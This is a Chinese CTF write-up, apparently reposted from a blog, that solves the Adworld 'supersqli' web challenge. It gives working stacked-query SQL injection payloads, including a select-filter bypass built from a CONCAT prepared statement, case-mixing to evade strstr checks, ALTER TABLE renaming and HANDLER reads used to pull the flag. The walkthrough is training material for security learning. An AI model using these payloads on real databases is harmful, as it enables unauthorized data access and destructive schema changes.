码迷,mamicode.com
首页 > 数据库 > 详细

攻防世界-web-高手进阶区017-supersqli

时间:2020-03-13 01:16:19      阅读:100      评论:0      收藏:0      [点我收藏+]

标签:arc   方式   bsp   sqli   http   prepare   tables   应该   first   

方法一:

1.输入1’发现不回显,然后1’ #显示正常,应该是存在sql注入了

 技术图片

 

 

2.order by 2的时候是正常回显了,order by 3就出错了,只有2个字段这时候用union select进行联合查询,发现关键字被正则过滤

 技术图片

 

 

3.尝试堆叠注入

-1‘;show tables --+

 技术图片

 

 

4.查看字段,

-1‘;show columns from `1919810931114514` --+

-1‘;show columns from `words` --+

 技术图片

 技术图片

 

 

5.查看值,需要绕过select的限制,我们可以使用预编译的方式

-1‘;set @sql = CONCAT(‘se‘,‘lect * from `1919810931114514`;‘);prepare stmt from @sql;EXECUTE stmt;#

拆分开来如下

-1‘;

set @sql = CONCAT(‘se‘,‘lect * from `1919810931114514`;‘);

prepare stmt from @sql;

EXECUTE stmt; #

 技术图片

 

 

6.这里用strstr函数过滤了setprepare关键词strstr这个函数并不能区分大小写,我们将其大写即可。

-1‘;sEt @sql = CONCAT(‘se‘,‘lect * from `1919810931114514`;‘);prEpare stmt from @sql;EXECUTE stmt;#

 技术图片

 

 


 

方法二:

1.由上面的探测我们可以猜测出这里会查询出words表的data列的结果。也就是类似于下面的sql语句:

select * from words where id = ‘‘;

 

2.我们将表1919810931114514名字改为wordsflag列名字改为id,那么就能得到flag的内容了。

修改表名和列名的语法如下:

修改表名(将表名user改为users)alter table user rename to users;

修改列名(将字段名username改为name)alter table users change uesrname name varchar(30);

 

3.最终payload如下:

1‘; alter table words rename to words1;alter table `1919810931114514` rename to words;alter table words change flag id varchar(50);#

拆分开来如下

1‘;

alter table words rename to words1;

alter table `1919810931114514` rename to words;

alter table words change flag id varchar(50);

#

 

4.然后使用1‘ or 1=1#即可查询出flag

 


 

方法三:

使用handler查询,payload如下:

-1‘;handler `1919810931114514` open;handler `1919810931114514` read first;#

 


 

攻防世界-web-高手进阶区017-supersqli

标签:arc   方式   bsp   sqli   http   prepare   tables   应该   first   

原文地址:https://www.cnblogs.com/joker-vip/p/12483823.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!